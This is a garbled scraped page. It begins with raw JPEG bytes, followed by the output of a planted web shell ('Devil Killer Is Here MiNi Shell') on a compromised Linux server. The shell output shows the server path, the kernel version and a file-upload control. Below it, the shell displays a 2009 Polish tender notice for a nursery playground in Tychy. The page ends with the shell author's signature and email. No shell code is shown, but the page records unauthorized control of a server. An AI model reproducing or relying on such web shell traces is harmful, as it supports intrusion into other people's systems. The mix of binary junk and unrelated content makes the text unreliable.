JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090721/247742-N-2009.html

<p class="kh_header"><b>Tychy: Zadanie nr 1 Budowa placu zabaw w Żłobku Miejskim przy ul. Fitelberga 4 w Tychach 
 Zadanie nr 2 Pełnienie nadzoru inwestorskiego dla zadania nr 1</b><br>
<b>Numer ogłoszenia: 247742 - 2009; data zamieszczenia: 21.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SPZOZ Żłobek Miejski w Tychach , ul. Fitelberga 4, 43-100 Tychy, woj. śląskie, tel. 0-32 227 49 93, faks 0-32 227 49 93.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.umtychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1 Budowa placu zabaw w Żłobku Miejskim przy ul. Fitelberga 4 w Tychach 
 Zadanie nr 2 Pełnienie nadzoru inwestorskiego dla zadania nr 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przygotowanie terenu pod budowę
2.Roboty w zakresie kształtowania terenów zielonych
3.Nadzór nad robotami budowlanymi
4.Montaż urządzeń zabawowych:
- tunel drewniany 2 szt
-tunel krótki 1 szt
-labirynt
-domek altanka ze stolikiem
5.Pełnienie nadzoru inwestorskiego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 37.50.00.00-3, 45.10.00.00-8, 45.11.27.10-5, 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1)Oferta Wykonawcy ubiegającego się  o udzielenie zamówienia w zakresie zadania nr 1 musi być zabezpieczona wadium w kwocie: 2 000,00 zł. (słownie: dwa tysiące złotych).
2)Wadium musi obejmować okres związania ofertą .
3)Termin wniesienia wadium upływa dnia 12 sierpnia 2009  roku o godz. 10 :15
2. Formy i miejsce wnoszenia wadium przez Wykonawcę:
1)Wadium może być wnoszone w jednej lub kilku następujących formach: 
W pieniądzu, przy spełnionym warunku że: O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data wpływu środków na rachunek Zamawiającego: 63105013991000002208507463, na którym to rachunku wadium będzie przechowywane.  
2)Inne formy wnoszenia wadium dopuszczone  przez Zamawiającego względem Wykonawcy:
a.w gwarancjach bankowych,
b.w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym,
c.w gwarancjach ubezpieczeniowych,
d.w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2, ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2000r. Nr 109, poz. 1158, ze zm.)
3)Wadium w formie, o której mowa w pkt. 2, należy złożyć w kasie żłobka od poniedziałku do piątku, w godzinach od 8:00 - 14:00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy,  którzy:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.
2. Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:

1)Wykonawcy  muszą spełniać warunki określone w art. 22 ust. 1 oraz nie podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 Ustawa o zmianie ustawy - Prawo zamówień publicznych Dz. U. z 23 września 2008 r. Nr 171, poz. 1058 z późn. zm.) poprzez złożenie oświadczenia oraz dokumentów wymaganych w niniejszej S.I.W.Z.
2)Wykonawca  musi być dopuszczony do występowania w obrocie prawnym.
3) Wykonawcy  muszą posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawić pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia, w szczególności:
a) Wykonawca ubiegający się o udzielenie zamówienia w zakresie zadania nr 1 musi  wykazać, że wykonał w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, roboty budowlane, polegające na budowie lub modernizacji co najmniej jednego placu zabaw, o wartości nie mniejszej niż 80 000,00 zł, a jeżeli okres prowadzenia działalności jest krótszy niż pięć lat, również musi wykazać wykonanie co najmniej jednej roboty budowlanej polegającej na budowie lub modernizacji placu zabaw i załączyć dokument potwierdzający, że robota ta została wykonana należycie;

b) Wykonawcy muszą  dysponować lub wykazać, że będą dysponowali osobą  lub sami nią są posiadającą uprawnienia budowlane do pełnienia nadzoru inwestorskiego lub  kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń, należącą do właściwego samorządu zawodowego, której to osobie, Wykonawca zamierza powierzyć funkcję kierownika budowy lub równoważne im ważne uprawnienia wydane według wcześniejszych przepisów;

4) W celu potwierdzenia, że oferowane urządzenia odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawcy muszą wykazać, że urządzenia zabawowe wraz z elementami wyposażenia posiadają certyfikaty bezpieczeństwa B, atesty oraz wymogi norm polskich i UE, a także zapewniają spełnienie wymogów formalnych i bezpieczeństwa dzieci odpowiednio do lat 3, w tym:

a)PN-EN 1176-1 oraz 1176-7 dla instalacji wyposażenia i urządzeń placów zabaw wraz z załączeniem folderów, fotografii lub katalogów, które obrazują poszczególne oferowane elementy i urządzenia na placu zabaw wraz z opisem szczegółowym oferowanych elementów urządzeń tj. wymiary, użyte materiały, farby, lakiery wraz z listą zalecanych części zamiennych;
b)certyfikaty i deklaracje bezpieczeństwa użytkowania urządzeń zabawowych wraz z elementami wyposażenia dla dzieci w wieku DO LAT 3; 
c)dopuszcza się montaż urządzeń zabawowych posiadających certyfikaty TUV, potwierdzające zgodność z Europejską Normą EN 1176 oraz polskim certyfikatem bezpieczeństwa B.

5)W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ww warunki mogą być spełnione łącznie. Oceniane będzie łączne doświadczenie Wykonawców ubiegających się wspólnie o udzielenie zamówienia.

3. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:

Warunki udziału w postępowaniu zostaną ocenione na zasadzie zerojedynkowej: spełnia nie spełnia na podstawie dokumentów i oświadczeń opisanych w części       II SIWZ, na którą składają się załączniki do formularza oferty.
Wykonawcy ubiegający się o udzielenie zamówienia w zakresie zadania nr 1,  muszą posiadać polisę ubezpieczenia oc na kwotę co najmniej 50 000,00 zł ,obejmującą co najmniej czas wykonywania robót..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Ofertę  Wykonawcy ubiegającego się o wykonanie zamówienia w zakresie   zadania nr 1 - Budowa placu zabaw w Żłobku Miejskim przy ul.  Fitelberga4, w Tychach muszą stanowić co najmniej niżej wymienione załączniki:

1.	Druk Oferta(sporządzony według wzoru druku załączonego do S.I.W.Z - załącznik nr 1) 
2.	Aktualny odpis z właściwego dla Wykonawcy rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed terminem  składania ofert.
3.	Oświadczenie, że Wykonawca spełnia wymogi określone w art. 22 ust. 1 i art. 24 ustawy Pzp. Dla Wykonawców wspólnie ubiegających się o zamówienie warunek oceniany będzie jako spełniony łącznie. Wykonawcy wspólnie ubiegający się o zamówienie muszą z osobna złożyć ww. oświadczenie (sporządzone według wzoru druku załączonego do S.I.W.Z - załącznik nr 2) 
4.	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, ze wskazaniem kierownika robót oraz załączeniem dokumentów potwierdzających, że osoba wskazana na kierownika robót posiada wymagane uprawnienia oraz aktualne zaświadczenie o przynależności tej osoby do właściwego samorządu zawodowego, a także pisemne zobowiązanie innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeżeli w wykazie Wykonawca wskaże takie osoby, jako osoby którymi będzie dysponował (sporządzony według wzoru druku załączonego do S.I.W.Z - załącznik nr 3).
5.	Wykaz wykonanych przez Wykonawcę robót budowlanych, poświadczających że wykonał on w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, roboty budowlane polegające na budowie lub modernizacji co najmniej jednego placu zabaw, o wartości nie mniejszej niż 80 000,00 zł. Dotyczy również Wykonawców, których  okres prowadzenia działalności jest krótszy niż pięć lat. (sporządzony według wzoru druku załączonego do S.I.W.Z - załącznik nr 4).
6.Dokument w tym referencje potwierdzające, że wybudowany plac zabaw wymieniony w załączniku nr 4 został wykonany należycie. 
7.Odpis lub kserokopia uprawnień do pełnienia funkcji kierownika budowy który będzie reprezentował   Wykonawcę. 
8.Aktualne zaświadczenie o przynależności kierownika budowy reprezentującego Wykonawcę do właściwego samorządu zawodowego.
9.certyfikat zgodności lub deklarację zgodności dla instalacji wyposażenia i urządzeń placów zabaw PN-EN 1176-1, PN-EN 1176-7 lub równoważne dla poszczególnych elementów, urządzeń, gdzie dopuszcza się montaż urządzeń zabawowych posiadających certyfikaty TUV, potwierdzające zgodność z Europejską Normą EN 1176 oraz polskim certyfikatem bezpieczeństwa B, atestami oraz wymogami norm polskich i UE;
10.foldery, fotografie lub katalogi obrazujące poszczególne elementy placu zabaw i urzządzenia na placu zabaw oraz opis techniczny oferowanych urządzeń, tj.; wymiary, użyte materiały, farby, lakiery wraz z listą zalecanych części zamiennych; 
11.certyfikaty , deklaracje bezpieczeństwa użytkowania zaoferowanych urządzeń zabawowych wraz z elementami wyposażenia, zapewniające spełnienie wymogów formalnych i bezpieczeństwa dzieci odpowiednio do lat 3.
12.polisa ubezpieczenia oc na kwotę conajmniej 50 000,00 zł ,obejmująca conajmniej okres  wykonywania robót.
Ofertę  Wykonawcy ubiegającego się o wykonanie zamówienia w zakresie   zadania nr 2 tj. Pełnienie nadzoru inwestorskiego dla zadanie nr 1,  muszą stanowić co najmniej niżej wymienione załączniki:
1.Druk Oferta (sporządzony według wzoru druku załączonego do S.I.W.Z - załącznik nr 1A) 
2.Oświadczenie, że Wykonawca spełnia wymogi określone w art. 22 ust. 1 i art. 24 ustawy Pzp. (sporządzone według wzoru druku załączonego do S.I.W.Z - załącznik nr 2 A) 
3.Wskazanie osoby którą dysponuje Wykonawca, która będzie uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia. (sporządzony według wzoru druku załączonego do S.I.W.Z - załącznik nr 3)  
4.Dokumenty  potwierdzające, że osoba wskazana na inspektora nadzoru  posiada wymagane uprawnienia oraz aktualne zaświadczenie o przynależności tej osoby do właściwego samorządu zawodowego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Żłobek Miejski w Tychach
ul. Fitelberga 4
43-100 Tychy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2009 godzina 10:00, miejsce: Żłobek Miejski w Tychach
ul. Fitelberga 4
43-100 Tychy
pokój nr 02 parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa placu zabaw w Żłobku Miejskim przy ul. Fitelberga 4 w Tychach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie terenu pod budowę
Roboty w zakresie kształtowania terenów zielonych
Gry i zabawki, wyposażenie parków zabaw.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.50.00.00-3, 45.10.00.00-8, 45.11.27.10-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie nadzoru inwestorskiego dla zadania nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -reprezentowanie Zamawiającego na budowie,
-sprawowanie kontroli zgodności realizacji budowy z projektem  z przepisami oraz zasadami wiedzy technicznej,
-sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,
-sprawdzanie zgodności wykonywanych robót z umowami z wykonawcami, w tym z ofertami i harmonogramem prac, także w zakresie użytych materiałów,
-sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w odbiorach technicznych urządzeń zabawowych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów zabawowych i przekazywanie ich do użytkowania wspólnie  z akredytowaną, wybraną przez Wykonawcę jednostką upoważnioną do odbiorów placów zabaw,  zgodnie z zapisami części  normy PN-EN 1176 Nowy plac zabaw powinien być poddany kontroli przez kompetentne osoby w celu oceny zgodności z przepisami odpowiedniej  części PN-EN 1176, 
potwierdzanie faktycznie wykonanych robót oraz usunięcia wad,
niezwłoczne informowanie Zlecającego o wszelkich niezgodnościach oraz nieprawidłowościach w realizacji prac,
dokumentowanie dokonywanych czynności wpisami w dziennikach budowy oraz inne, wynikające z obowiązujących przepisów czynności..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com